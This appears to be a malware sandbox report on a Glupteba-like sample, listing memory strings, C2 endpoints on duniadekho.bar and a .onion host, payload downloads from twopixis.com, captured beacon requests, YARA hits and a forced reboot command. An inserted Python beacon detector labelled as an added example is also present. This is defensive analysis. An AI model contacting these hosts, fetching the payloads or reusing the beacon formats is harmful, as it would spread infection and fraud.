        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP
        Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4
        Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233b
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
        Source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.xmlspy.com)
        Source: csrss.exeString found in binary or memory: http://www.zlib.net/
        Source: csrss.exe, 00000014.00000003.210662530760.000000000C6C6000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210662422652.000000000C6D6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
        Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1.1.1.1/dns-query
        Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.sec-tunnel.com/v4/device_generate_passwordinternal
        Source: csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindex
        Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.sec-tunnel.com/v4/subscriber_logininconsistent
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blockchain.infoindex
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.bar
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barMicrosoft
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barSETCONF
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barTransfer-Encodingtworkpoll
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonPro
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
        Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210654541812.000000000C8A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe
        Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ameshkov/dnslookup/
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.comW
        Source: csrss.exe, 00000014.00000003.210653294128.000000000C950000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210671924295.000000000C4BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a853
        Source: csrss.exe, 00000014.00000003.210653914185.000000000C90E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581
        Source: csrss.exe, 00000014.00000003.210667598347.000000000C5EA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/poll
        Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/restriction-us
        Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/restriction-usH2
        Source: csrss.exe, 00000014.00000003.209395939200.000000000C624000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/signature/
        Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e
        Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.barH
        Source: csrss.exe, 00000014.00000003.210659083983.000000000C7FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%29
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
        Source: csrss.exe, 00000014.00000003.213017406273.000000000C52C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210668268821.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5C4000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213015280823.000000000C5AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog/watchdog.exe
        Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog/watchdog.exeSETCONF
        Source: csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twopixis.com/watchdog/watchdog.exeno-store
        Source: csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error
        Source: csrss.exe, 00000014.00000003.213015103821.000000000C5F2000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213019914167.000000000C460000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211840953641.000000000C45E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209393805620.000000000C6D8000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210667163276.000000000C5EE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213017192448.000000000C544000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
        Source: unknown | HTTP traffic detected:
            POST /api/restriction-us HTTP/1.1
            Host: server5.duniadekho.bar
            User-Agent: Go-http-client/1.1
            Content-Length: 152
            Content-Type: application/x-www-form-urlencoded
            Version: 195
            Accept-Encoding: gzip
        Source: unknown | DNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
        Source: global traffic | HTTP traffic detected:
            GET /attachments/1087398815188910163/1087399133926674453/LZ.zip HTTP/1.1
            Host: cdn.discordapp.com
            User-Agent: Go-http-client/1.1
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 HTTP/1.1
            Host: server5.duniadekho.bar
            User-Agent: Go-http-client/1.1
            Version: 195
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /watchdog/watchdog.exe HTTP/1.1
            Host: twopixis.com
            User-Agent: Go-http-client/1.1
            Uuid: ec87b504-92ea-4d22-a937-161700799581
            Version: 195
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /api/signature/21f67ca2e1b8b0405399c65a0e0d031e HTTP/1.1
            Host: server5.duniadekho.bar
            User-Agent: Go-http-client/1.1
            Uuid: ec87b504-92ea-4d22-a937-161700799581
            Version: 195
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe HTTP/1.1
            Host: github.com
            User-Agent: Go-http-client/1.1
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /github-production-release-asset-2e65be/350494541/0257ea00-a853-11eb-8659-1a96e3eed860?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230528%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230528T093319Z&X-Amz-Expires=300&X-Amz-Signature=25a5fa811961f6d4a9ae1ad0a06038ccbf899e81292d2f437487b8af95f18898&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=350494541&response-content-disposition=attachment%3B%20filename%3Dopera-proxy.windows-386.exe&response-content-type=application%2Foctet-stream HTTP/1.1
            Host: objects.githubusercontent.com
            User-Agent: Go-http-client/1.1
            Referer: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /watchdog/watchdog.exe HTTP/1.1
            Host: twopixis.com
            User-Agent: Go-http-client/1.1
            Uuid: ec87b504-92ea-4d22-a937-161700799581
            Version: 195
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe HTTP/1.1
            Host: twopixis.com
            User-Agent: Go-http-client/1.1
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /w/w-8-debug.exe HTTP/1.1
            Host: twopixis.com
            User-Agent: Go-http-client/1.1
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe HTTP/1.1
            Host: twopixis.com
            User-Agent: Go-http-client/1.1
            Accept-Encoding: gzip
        Source: global traffic | HTTP traffic detected:
            GET /gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe HTTP/1.1
            Host: twopixis.com
            User-Agent: Go-http-client/1.1
            Accept-Encoding: gzip
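The requests above share a shape that is easy to hunt for: the Go default User-Agent (Go-http-client/1.1) together with non-standard Version and Uuid headers, a uuid= query parameter carrying the same identifier, and a DNS query for that identifier as a label under uuid.duniadekho.bar. The script below is an added example for this report and is not Joe Sandbox or Glupteba code; its request texts are constructed to mirror the captures listed above (plus one benign control), and its thresholds are assumptions drawn from this traffic rather than a published signature.

```python
"""Beacon heuristics for the Go-http-client requests captured above.

Added example for this report; it is not Joe Sandbox or Glupteba code.
The request texts are constructed to mirror the captured requests, plus
one benign control. The heuristics (the Go default User-Agent combined
with a numeric Version header, a Uuid header or a uuid= query parameter,
and a UUID label directly under a "uuid" label in DNS) are assumptions
drawn from this traffic, not a published signature.
"""
import re
from urllib.parse import parse_qs, urlsplit

UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I
)

# Constructed inputs: request line plus headers, as the sandbox shows them.
SAMPLE_REQUESTS = [
    "POST /api/restriction-us HTTP/1.1\r\nHost: server5.duniadekho.bar\r\n"
    "User-Agent: Go-http-client/1.1\r\nContent-Length: 152\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nVersion: 195\r\n"
    "Accept-Encoding: gzip\r\n\r\n",
    "GET /api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 "
    "HTTP/1.1\r\nHost: server5.duniadekho.bar\r\nUser-Agent: Go-http-client/1.1\r\n"
    "Version: 195\r\nAccept-Encoding: gzip\r\n\r\n",
    "GET /watchdog/watchdog.exe HTTP/1.1\r\nHost: twopixis.com\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "Uuid: ec87b504-92ea-4d22-a937-161700799581\r\nVersion: 195\r\n"
    "Accept-Encoding: gzip\r\n\r\n",
    "GET /Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe "
    "HTTP/1.1\r\nHost: github.com\r\nUser-Agent: Go-http-client/1.1\r\n"
    "Accept-Encoding: gzip\r\n\r\n",
    # Benign control: an ordinary browser request with no custom headers.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nAccept-Encoding: gzip\r\n\r\n",
]


def parse_request(raw):
    """Split a raw request into (method, path, headers); header names lower-cased."""
    lines = [ln for ln in raw.split("\r\n") if ln]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify(raw):
    """Return the indicators found in one request and the beacon verdict."""
    method, path, headers = parse_request(raw)
    hits = []
    if headers.get("user-agent", "").startswith("Go-http-client/"):
        hits.append("go-http-client UA")
    if re.fullmatch(r"\d+", headers.get("version", "")):
        hits.append("numeric Version header")
    uuid = headers.get("uuid", "")
    if UUID_RE.match(uuid):
        hits.append("Uuid header")
    else:
        uuid = parse_qs(urlsplit(path).query).get("uuid", [""])[0]
        if UUID_RE.match(uuid):
            hits.append("uuid= query parameter")
        else:
            uuid = ""
    # The Go UA alone is common in legitimate tooling; require a second indicator.
    beacon = "go-http-client UA" in hits and len(hits) >= 2
    return {"method": method, "host": headers.get("host", ""), "path": path,
            "uuid": uuid, "indicators": hits, "beacon": beacon}


def scan(requests=SAMPLE_REQUESTS):
    return [classify(r) for r in requests]


def beacon_hosts(records):
    """Hosts worth blocking: those contacted by requests judged to be beacons."""
    return sorted({r["host"] for r in records if r["beacon"]})


def is_uuid_dns_name(name):
    """True for <uuid>.uuid.<domain>, the shape of the DNS lookup seen above."""
    labels = name.lower().rstrip(".").split(".")
    return len(labels) >= 3 and labels[1] == "uuid" and bool(UUID_RE.match(labels[0]))


if __name__ == "__main__":
    for rec in scan():
        print(rec["beacon"], rec["host"], rec["path"], rec["indicators"])
    print(beacon_hosts(scan()))
```

Run against the constructed set, the two C2-style hosts (server5.duniadekho.bar and twopixis.com) are the only ones flagged; the GitHub download of opera-proxy carries the Go UA but nothing else, which is why the verdict needs a second indicator rather than the UA alone.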

        E-Banking Fraud

        Source: Yara match | File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

        System Summary

        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: kdsyitkxmS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 58.3.csrss.exe.4331420.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 61.3.csrss.exe.4331420.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 10.3.kdsyitkxmS.exe.40e1420.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 23.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 31.3.csrss.exe.431bb00.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 55.3.csrss.exe.4321700.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 55.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 10.3.kdsyitkxmS.exe.40d1700.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
